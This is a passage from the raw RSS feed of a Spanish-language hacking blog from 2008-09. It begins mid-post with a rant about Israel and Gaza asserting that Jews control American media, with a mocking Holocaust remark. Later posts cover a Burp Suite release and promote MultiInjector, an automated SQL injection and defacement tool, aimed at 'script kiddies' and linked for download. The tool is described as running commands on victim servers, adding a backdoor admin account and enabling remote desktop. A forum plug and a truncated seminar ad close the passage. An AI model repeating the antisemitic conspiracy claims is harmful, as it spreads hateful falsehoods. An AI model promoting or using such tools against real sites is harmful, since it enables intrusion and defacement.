Terrorismo sitematico y acusa al grupo extremista "&lt;a href="http://newcentrist.files.wordpress.com/2007/07/28jan06-hamas-brothers.jpg"&gt;Hamas&lt;/a&gt;" islamico de haber roto el acuerdo de cese al fuego del 4 de noviembre...&lt;br /&gt;&lt;br /&gt;pero realmente "Hamas" violo ese acuerdo? es muy dificil de determinar ya que como es de esperarse los judios controlan los &lt;a href="www.cnn.com/espanol/"&gt;medios&lt;/a&gt; americanos entonces a que resulta esto..&lt;br /&gt;&lt;br /&gt;maquillan la informacion y Israel sigue con su terrorismo con licencia en tierra palestina/...&lt;br /&gt;&lt;br /&gt;lo peor de todo se hacen las victimas benditos del holocausto que les causo hitler en aquellos tiempos cosa que yo no apoyo pero igual condeno lo que hacen los judios ahora con nuestros hermanos palestinos...&lt;br /&gt;&lt;br /&gt;entonces sera real que es lo que pasa simplemente se desquitan de los que le hizo la Alemania Nazi de un pueblo inferior?....&lt;br /&gt;&lt;br /&gt;estas son las &lt;a href="http://cdnll-1.liveleak.com/s/18/media18/2009/Jan/12/LiveLeak-dot-com-2a4f76aa9ef9-9_68_d320.jpg?h=4698b9c2c83cfb1388a53f156b4c2a32&amp;amp;e=1232417451&amp;amp;rs=150"&gt;lluvias de terror que israel le da al pueblo de palestina&lt;/a&gt;?&lt;br /&gt;aparte de su propaganda falsa de calumnias mientras usan a los palestinos como &lt;a href="http://cdnll-3.liveleak.com/s/16/media16/2008/Apr/29/LiveLeak-dot-com-177687-LiveLeakdotcom51401shield111_jpg_thumb.jpg?h=d7471455298c21fc2f9744991c2aa3fa&amp;amp;e=1232417614&amp;amp;rs=150"&gt;escudos humanos&lt;/a&gt;  que manera tan etica de pelear su guerra mientras gastan miles de millones en armamento de mano de los &lt;a href="http://www.gnosticliberationfront.com/israel22.jpg"&gt;Americanos ...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;por que Israel no deja su mensaje de terror y acusa a sus vecinos de ser terroristas?&lt;br /&gt;&lt;br /&gt;si y como lloran cuando pierden uno de los &lt;a href="http://www.think-israel.org/jul05pix/isralert.2soldiers.crying.jpg"&gt;suyos&lt;/a&gt;...&lt;br /&gt;&lt;br /&gt;pero la realidad es que nadie dice nada por las &lt;a href="http://www.worldproutassembly.org/images/strike_2.jpg"&gt;atrocidades&lt;/a&gt; que ellos hacen al pueblo palestino,, los &lt;a href="http://palestinianvoice.files.wordpress.com/2008/03/gaza_mother_dead_children.jpg"&gt;asesinatos de ninos &lt;/a&gt;&lt;br /&gt;y de &lt;a href="http://www.disgrunt.com/wp-content/uploads/2006/11/deadwomen.jpg"&gt;mujeres palestinas&lt;/a&gt; y de &lt;a href="http://cache.daylife.com/imageserve/02yYbvza79ePQ/610x.jpg"&gt;civiles&lt;/a&gt; a todo dar...&lt;br /&gt;&lt;br /&gt;entonces cuando alguien en el jodido mundo tendra la conciencia de parar a &lt;a href="http://apu.themysteryparade.com/soldiers.jpg"&gt;estos idiotas&lt;/a&gt; ..&lt;br /&gt;&lt;br /&gt;no pero hay muchos &lt;a href="http://media.ebaumsworld.com/picture/k9powerlifter/IDIOTS.png"&gt;ignorantes&lt;/a&gt;, que piensan "&lt;a href="http://bajurtov.blogdiario.com/img/CHICOASESINO.JPG"&gt;que se jodan los terroristas&lt;/a&gt;" ..pero realmente si un monton de tipos te vienen a dar una &lt;a href="http://media1.break.com/dnet/media/2008/3/face-slap-in-slow-motion.jpg"&gt;bofetada&lt;/a&gt; , no te defenderias? o te quedarias de manos cruzadas o si mejor aun un solo tipo te viene a &lt;a href="http://www.boygeniusreport.com/wp-content/uploads/image/monkey-slap.jpg"&gt;golpear&lt;/a&gt; en tu propia casa? no te defenderias?&lt;br /&gt;&lt;br /&gt;Israel son los que suprimen este pueblo destruyendole sus casas,sus escuelas,sus hospitales y su vida solo por ser territoriales,...&lt;br /&gt;&lt;br /&gt;es lo mismo que ellos hiceron con &lt;a href="http://www.lib.utexas.edu/maps/middle_east_and_asia/israel_nbr90.jpg"&gt;egipto&lt;/a&gt; para &lt;a href="http://es.wikipedia.org/wiki/Guerra_de_los_Seis_D%C3%ADas"&gt;ocupar mas su territorio&lt;/a&gt;.. lo que pasa en este caso es que los palestinos no se dejan...&lt;br /&gt;&lt;br /&gt;Paren la maldita violencia en palestina ellos solo quieren su estado independiente...&lt;br /&gt;&lt;br /&gt;ya breve les traere mas info de todo esto y si lo digo asi libremente:&lt;br /&gt;&lt;br /&gt;Apoyo a la liberacion de palestina y el reconocimiento de un Estado Palestino Independiente...&lt;br /&gt;&lt;br /&gt;ninguna celula terrorista me paga por hacer mensajes,ni por tener contactos arabes,turkos o palestinos...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-708461255875086983?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/WJ8rlC827vk" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-01-12T18:54:52.549-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/01/seguira-el-abuso-de-israel-zionistas.html</feedburner:origLink></item><item><title>Burp Suite v1.2 Liberada - Aplicacion para Auditar y Ataque Web</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/II-fW83eTCo/burp-suite-v12-liberada-aplicacion-para.html</link><category>defacing</category><category>Herramientas</category><category>pentest</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Sat, 03 Jan 2009 18:26:04 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-6253702948968477206</guid><description>&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;Burp Suite es una plataforma integrada para atacar aplicaciones Web.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Contiene todas las herramientas De Burp con numerosas interfaces entre ellas destinadas a facilitar y acelerar el proceso de atacar a una solicitud&lt;/span&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;.&lt;/span&gt; Todas las herramientas comparten el mismo marco sólido para el manejo de solicitudes HTTP, la persistencia, la autenticación, los servidores proxy, la tala, la alerta y la extensibilidad.&lt;/span&gt; &lt;p&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;Burp Suite &lt;/span&gt; le permite combinar técnicas manuales y automáticas para enumerar, analizar, explorar, atacar y explotar aplicaciones Web.&lt;/span&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt; Burp Suite te permite verificar las diversas herramientas de trabajar juntos de manera efectiva para compartir información y permitir conclusiones identificadas en una herramienta para formar la base de un ataque con otro (Las herramientas son proxy, Spider, escáner, intrusión, repetidor, Secuenciador, decodificador y Comparer).&lt;/span&gt; &lt;/p&gt;&lt;p&gt;&lt;!--adsense#New468--&gt;&lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Las principales características exclusivas de Burp Suite incluyen:&lt;/span&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;análisis detallado y la prestación de solicitudes y respuestas.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Transferencia de un solo clic de solicitudes interesantes entre herramientas.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Capacidad de "pasivamente" auditar una solicitud en forma no intrusiva, con todas las solicitudes emanadas desde el navegador del usuario.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Compatible con FIPS-análisis estadístico de la sesión simbólica aleatoriedad.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Utilidades para la decodificación y la comparación de datos de aplicación.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Apoyo personalizado para el cliente y el servidor de certificados SSL.&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Extensibilidad a través de la interfaz IBurpExtender.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Centralizada para configurar los ajustes de proxy, web y proxy de autenticación, y la explotación forestal.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; Las &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Herramientas se pueden ejecutar en una única ventana con pestañas, o ser separado en cada uno de las ventanas.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Se ejecuta en Linux asi como en  Windows :S .&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Nuevas características en la versión 1.2 incluyen:&lt;/span&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Mapa del sitio muestra la información acumulada sobre las solicitudes de destino en forma de árbol y en el cuadro.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;Web Vulnerability Scanner.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; [Sólo versión Pro]&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Suite nivel objetivo alcance configuración, herramienta de conducción numerosas acciones.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Muestra filtros de mapa de la web y Proxy petición historia.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Capacidad de guardar y restaurar estado.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; [Sólo versión Pro]&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Suite en toda la función de búsqueda.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Soporte para proxy invisible.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--adsense#New468--&gt;&lt;/p&gt;&lt;p&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;Burp&lt;/span&gt; Suite es una aplicación Java, y funciona en cualquier plataforma para que un entorno de ejecución Java que este disponible.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Requiere la versión 1.5 o posterior&lt;/span&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;.&lt;/span&gt; El JRE se puede obtener gratuitamente desde&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;a href="http://java.sun.com/javase/downloads/index.jsp"&gt;java.sun.com&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Descarga Burp Suite desde &lt;a href="http://portswigger.net/suite/burpsuite_v1.2.zip"&gt;Aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Lee Aka --&gt; &lt;a href="http://portswigger.net/suite/"&gt;(O)&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-6253702948968477206?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/II-fW83eTCo" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-01-03T18:26:04.417-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://portswigger.net/suite/burpsuite_v1.2.zip" length="1669851" type="application/zip" /><feedburner:origLink>http://h4xxor.blogspot.com/2009/01/burp-suite-v12-liberada-aplicacion-para.html</feedburner:origLink></item><item><title>MultiInjector v0.3 Liberada- SQL Injection y Herramienta de  Defacement Automatica</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/e47Z8BLBUFA/multiinjector-v03-liberada-sql.html</link><category>defacing</category><category>Herramientas</category><category>SQL Inyection</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Sat, 03 Jan 2009 18:15:24 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-4034378636845328893</guid><description>&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;strong&gt;La Mejor Herramienta para los script kiddies xD......&lt;br /&gt;&lt;br /&gt;Características&lt;/strong&gt;&lt;/span&gt;&lt;p&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Recibe una lista de URL como entrada&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Reconoce los parámetros URL de la lista&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Realiza Fuzzing a  todos los parámetros de URL para concatenar los carga útil una vez que la inyección se realiza correctament&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Ejecuta  comandos - a distancia que permite Ejecutar una xp_cmdshell en el servidor SQL, posteriormente, ejecutar comandos en cualquier sistema operativo arbitrarias líneas de comandos introducidos por el usuario.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Configurable a conexiones paralelas exponencialmente acelera el proceso de ataque - una carga útil, múltiples objetivos, ataques simultáneos&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Uso opcional de un proxy HTTP para ocultar el origen de los ataques&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--adsense#New468--&gt;&lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;strong&gt;Cambios&lt;/strong&gt;&lt;/span&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Trata de concatenar una cadena a todos los definidos por el usuario en los campos del texto del PP (defaceo automatico)&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;ejecuta cualquier comando como si estas usando una consola de comandos en la máquina  (Victima)&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Ejecutar comandos SQL de su elección&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Activa el procedimiento de shell OS PP - Revive los viejos xp_cmdshell en el que se apaga&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Añade usuario administrativo (maquina victima) al servidor con contraseña: T0pSeKret&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Habilitar escritorio remoto en el servidor (victima)&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Añadido  / tipo de parámetro de cadena de detección (numerico)&lt;/span&gt; &lt;/li&gt;&lt;li&gt;Se &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Mejor  la manipulación por desfiguración contenido escapar comillas&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Soporte mejorado para sistemas Linux&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Fija el "número inválido de conexiones simultáneas" fracasado debido a la falta de parámetros URL&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Puede descargar aquí &lt;a href="http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz"&gt;MultiInjector v0.3..&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;a href="http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-4034378636845328893?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/e47Z8BLBUFA" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-01-03T18:15:24.081-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz" length="7055360" type="application/x-gzip" /><feedburner:origLink>http://h4xxor.blogspot.com/2009/01/multiinjector-v03-liberada-sql.html</feedburner:origLink></item><item><title>ClubHacker</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/cD1j16yE2iI/clubhacker.html</link><category>Noticias</category><category>Links</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Wed, 31 Dec 2008 14:30:35 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-4649820589952562733</guid><description>El Proyecto De Clubhacker sigue en pie.,a raiz de preguntas de colegas sobre si el proyecto habia desaparecido pero no...aun esta...&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Queremos crear algo diferente y que los usuarios sean parte de el creando proyectos propios y de autoria de los usuarios,es la manera de crear y imnovar..&lt;br /&gt;&lt;br /&gt;la informatica es una pasion todos tenemos proyectos encima de los cuales mas de la mitad no concretamos pero si hacemos un equipo se puede lograr y marcar la diferencia...&lt;br /&gt;&lt;br /&gt;El Internet es la herramienta de conocimiento mas poderosa del mundo asi como el conocimiento es poder,queremos exortar a los usuarios que se unan a clubhacker y seamos artifices de investigar,ejecutar y crear proyectos interesantes de modo que compartamos el conocimiento a medida que aprendemos...&lt;br /&gt;&lt;br /&gt;&lt;/blockquote&gt;Y eso es lo que queremos hacer clubhacker fue creado hace poco un ano Por &lt;a href="http://clubhacker.org/smf/index.php?action=profile;u=1"&gt;el-mago&lt;/a&gt; y desde si es un usuario que a traido calidad y nivel en su trabajo..&lt;br /&gt;su &lt;a href="http://dennisruiz.net/home/"&gt;web &lt;/a&gt;habla de su perfil y queremos que sean parte de esto&lt;br /&gt;&lt;br /&gt;Entren &lt;a href="http://clubhacker.org/home/"&gt;Aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pd: Perdonen la poca actividad que e tenido pero estoy en vacaciones de navidad :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-4649820589952562733?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/cD1j16yE2iI" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-31T14:30:35.068-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/12/clubhacker.html</feedburner:origLink></item><item><title>Seminario De Penetration Testing</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/iE-IAHJljfk/penetration-testing.html</link><category>Articulos</category><category>pentest</category><category>Noticias</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Wed, 17 Dec 2008 12:09:42 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-3736081189219002617</guid><description>Bueno para los que vivan por el area de caguas les invito el proximo 21 de diciembre al siguiente seminario para que consigan sus certificaciones a nivel etico xD....&lt;br /&gt;&lt;br /&gt;no es tan dificil tampoco llegar a los que viven en el area metro:&lt;br /&gt;&lt;br /&gt;mas detalles:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: 700; color: rgb(5, 53, 105);font-family:Arial,Verdana,Geneva,Helvetica,sans-serif;" &gt;&lt;span style="font-size:130%;"&gt;Seminario de Penetration Testing!&lt;/span&gt;&lt;/span&gt; &lt;p&gt;&lt;span style="font-weight: 700;font-family:Arial,Verdana,Geneva,Helvetica,sans-serif;" &gt;¿Sabes cual es la mejor forma de conseguir trabajo en una empresa como analista de seguridad?... Hackiandola!.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;Seminario de Penetration Testing:&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;Este seminario está diseñado para que usted pueda aprender los conceptos y técnicas más comunes utilizada por los hackers, pero con el único propósito de usted pueda aprender a ofrecer los servicios de analista de seguridad y ayude a las empresas a mejorar su seguridad. Todas las empresas en el mundo pueden ser Hackiadas, TODAS!!. Ahora usted podrá saber como detectar los fallos de seguridad y trabajar para mejorarlos. Aprenderá a como hacer un penetration testing y como se mueve el mundo de los negocios de los Ethical Hackers en el mundo!. Ser un Hacker te puede llevar a la carcel, pero si sabes como sacarle dinero, te puede hacer rico.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;En este seminario usted aprenderá:&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;&lt;br /&gt;1. &lt;/strong&gt;Ethical Hacking&lt;/span&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte el participantes aprenderá como funciona la mente de los hackers y los atacantes de networks. El participante podrá saber cuales son las estrategias y tácticas principales usadas por los hackers.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;2. Leyes y Procesos legales del Gobierno de Estados Unidos.&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted conocerá cuales son las leyes que castigan a los hackers, sus penalidades y multas. Usted como analista de seguridad debe conocer cuales son las leyes y recursos legales para proteger su empresa o a su cliente.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;3&lt;/span&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;. &lt;/strong&gt;&lt;/span&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;Penetration Testing - Parte 1.&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte el Instructor explicará todos los detalles básicos sobre el Penetration Testing. Usted podrá entender los conceptos principales de las pruebas de seguridad y porqué se deberían hacer.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;4. Aprenderá a como crear un plan de "Penetration Testing"&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como crear un plan de penetration testing lógico para intentar hackiar una empresa y hacer las pruebas de seguridad.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: 900;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;5&lt;/span&gt;&lt;span style="font-weight: 900; text-align: justify;font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:9;"  &gt;&lt;strong&gt;. Ejecutando un "Penetration Testing"&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style=";font-family:Verdana,Geneva,Arial,Helvetica,sans-serif;font-size:8;"  &gt;En esta parte usted podrá aprender como se ejecuta un plan de "Penetration Testing", con el fin de saber donde se encuentra la falla y como un hacker entra un 